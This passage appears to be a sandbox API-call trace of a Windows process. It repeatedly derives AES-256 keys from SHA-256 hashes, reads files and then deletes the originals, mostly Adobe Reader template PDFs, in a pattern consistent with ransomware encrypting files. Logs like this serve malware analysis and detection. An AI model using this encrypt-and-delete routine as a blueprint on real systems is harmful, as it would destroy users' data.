CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0201.507] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10f09 [0201.507] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0201.513] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0201.513] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0201.513] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0201.514] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ptb\\defaultid.pdf")) returned 1 [0201.527] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0201.527] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0201.527] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0201.527] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.527] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0201.527] GetFileSize (in: hFile=0x600, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5891 [0201.528] ReadFile (in: hFile=0x600, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0201.565] CryptDestroyHash (hHash=0x284d668) returned 1 [0201.565] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0201.565] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0201.566] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rum\\adobeid.pdf")) returned 1 [0201.670] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0201.671] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0201.671] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.671] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0201.671] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5be8 [0201.671] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0201.674] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0201.674] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0201.674] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0201.676] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rum\\defaultid.pdf")) returned 1 [0201.677] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0201.677] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0201.677] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0201.677] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.677] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0201.677] GetFileSize (in: hFile=0x600, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1e071 [0201.678] ReadFile (in: hFile=0x600, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0201.698] CryptDestroyHash (hHash=0x284d668) returned 1 [0201.698] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0201.698] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0201.699] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rus\\adobeid.pdf")) returned 1 [0201.796] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0201.797] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0201.797] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.797] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0201.797] GetFileSize (in: hFile=0x5e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1d17f [0201.797] ReadFile (in: hFile=0x5e0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0201.814] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0201.814] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0201.814] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0201.816] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rus\\defaultid.pdf")) returned 1 [0201.818] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0201.818] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0201.819] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0201.819] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.819] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0201.819] GetFileSize (in: hFile=0x600, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x161fc [0201.819] ReadFile (in: hFile=0x600, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0201.843] CryptDestroyHash (hHash=0x284d668) returned 1 [0201.843] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0201.843] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0201.846] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sky\\adobeid.pdf")) returned 1 [0201.930] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0201.931] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0201.931] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.931] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0201.931] GetFileSize (in: hFile=0x604, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13d46 [0201.931] ReadFile (in: hFile=0x604, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0201.960] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0201.960] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0201.960] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0201.962] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sky\\defaultid.pdf")) returned 1 [0201.965] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0201.965] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0201.965] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0201.965] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0201.966] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0201.966] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6133 [0201.966] ReadFile (in: hFile=0x608, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0202.001] CryptDestroyHash (hHash=0x284d668) returned 1 [0202.001] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0202.001] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0202.003] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\slv\\adobeid.pdf")) returned 1 [0202.105] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0202.105] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0202.105] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0202.105] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0202.105] GetFileSize (in: hFile=0x604, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5aac [0202.106] ReadFile (in: hFile=0x604, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0202.109] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0202.109] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0202.109] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0202.110] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\slv\\defaultid.pdf")) returned 1 [0202.111] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0202.112] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0202.112] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0202.112] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0202.112] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0202.112] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x107e2 [0202.113] ReadFile (in: hFile=0x608, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0202.118] CryptDestroyHash (hHash=0x284d668) returned 1 [0202.118] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0202.118] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0202.119] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\suo\\adobeid.pdf")) returned 1 [0202.231] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0202.232] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0202.232] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0202.232] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0202.232] GetFileSize (in: hFile=0x604, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x102c8 [0202.232] ReadFile (in: hFile=0x604, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0202.237] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0202.237] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0202.238] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0202.239] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\suo\\defaultid.pdf")) returned 1 [0202.240] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0202.241] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0202.241] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0202.241] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0202.241] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0202.241] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12696 [0202.241] ReadFile (in: hFile=0x608, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0202.259] CryptDestroyHash (hHash=0x284d668) returned 1 [0202.259] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0202.259] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0202.260] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sve\\adobeid.pdf")) returned 1 [0202.477] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0202.478] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0202.478] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0202.478] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0202.478] GetFileSize (in: hFile=0x604, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11c35 [0202.478] ReadFile (in: hFile=0x604, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0202.483] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0202.483] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0202.484] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0202.485] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sve\\defaultid.pdf")) returned 1 [0202.487] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0202.487] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0202.488] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0202.488] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0202.488] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0202.488] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x49db0 [0202.488] ReadFile (in: hFile=0x608, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0202.542] CryptDestroyHash (hHash=0x284d668) returned 1 [0202.542] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0202.542] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0202.544] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\tur\\adobeid.pdf")) returned 1 [0202.651] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0202.652] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0202.652] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0202.652] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0202.652] GetFileSize (in: hFile=0x604, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x48d8f [0202.652] ReadFile (in: hFile=0x604, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0202.677] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0202.677] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0202.677] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0202.678] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\tur\\defaultid.pdf")) returned 1 [0202.681] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0202.681] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0202.682] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0202.682] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0202.682] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0202.682] GetFileSize (in: hFile=0x608, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x197f2 [0202.682] ReadFile (in: hFile=0x608, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0202.697] CryptDestroyHash (hHash=0x284d668) returned 1 [0202.697] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0202.697] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0202.698] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\AdobeID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\adobeid.pdf")) returned 1 [0202.786] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0202.787] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0202.787] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0202.787] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0202.787] GetFileSize (in: hFile=0x604, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x48d20 [0202.787] ReadFile (in: hFile=0x604, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0202.806] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0202.806] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0202.806] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0202.807] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\defaultid.pdf")) returned 1 [0202.811] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0202.811] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0202.811] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0202.811] CryptHashData (hHash=0x284d628, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0202.811] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0202.812] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x121ba8 [0202.812] ReadFile (in: hFile=0x5c0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0202.970] CryptDestroyHash (hHash=0x284d628) returned 1 [0202.970] CryptDestroyKey (hKey=0x284d668) returned 1 [0202.970] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0203.078] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\JSByteCodeWin.bin" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\javascripts\\jsbytecodewin.bin")) returned 1 [0203.095] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.103] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.103] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.104] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.104] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.104] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, 